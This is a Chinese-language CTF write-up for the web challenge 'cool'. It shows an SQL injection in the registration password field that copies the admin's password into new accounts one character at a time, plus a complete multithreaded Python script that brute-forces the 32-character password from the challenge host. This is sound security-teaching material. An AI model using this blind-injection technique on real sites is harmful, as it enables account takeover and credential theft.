CTF题目 July. 13th 2021

web/cool

Aaron has a message for the cool kids. For support, DM BrownieInMotion.

cool.mc.ax

Download: app.py

网页是一个登录页面,一个注册页面。注册页面可以注册账号,但登陆后会提示并不是名字为ginkoid的人。显然,这题是要得到ginkoid的密码。

下载下来一个.py文件:app.py

其中create_user和check_login两个函数中,都是直接格式化SQL语句,有可能注入。

对username进行了检查,不能有A-Za-z1-9以外的字符。但没有检查register时的password,所以在这里做文章。

在register的密码框里面输入'||substr((select password from users),1,1));--,可以注册成功,并且密码是第一个人(ginkoid)的密码的第一个字符。可以暴力破解出第一个字符是什么。依此类推,直到破解完32位。运行下面的Python代码得到密码。

登录后自动下载一个.mp3文件,查看二进制,末尾是flag:flag-at-end-of-file.mp3

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

from requests import session
from multiprocessing import pool, Lock


def run(i):
    print("Thread {} start!".format(i))
    try:
        s = session()
        data = {"username": "CTFTeamCompassABC" + str(i) if i % 10 != 0 else str(i // 10)*3 + "DEF",
                "password": "'||substr((select password from users)," + str(i) + ",1));--"}
        r = s.post(post_url, data=data)
        r = s.get("https://cool.mc.ax/logout")

        for j in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789':
            data["password"] = j
            r = s.post(login_url, data=data)
            if ("You are logged in!" in r.text):
                threadLock.acquire()
                result[i] = j
                threadLock.release()
                print("{}: {}".format(i, j))
                r = s.get("https://cool.mc.ax/logout")
                break
    except Exception as e:
        print(e)
        run(i)


post_url = 'https://cool.mc.ax/register'
login_url = 'https://cool.mc.ax/'

result = {}

threadPool = pool.ThreadPool(10)
threadLock = Lock()
for i in range(1, 33):
    threadPool.apply_async(run, [i])

threadPool.close()
threadPool.join()

for i in sorted(result):
    print(result[i], end="")
print("")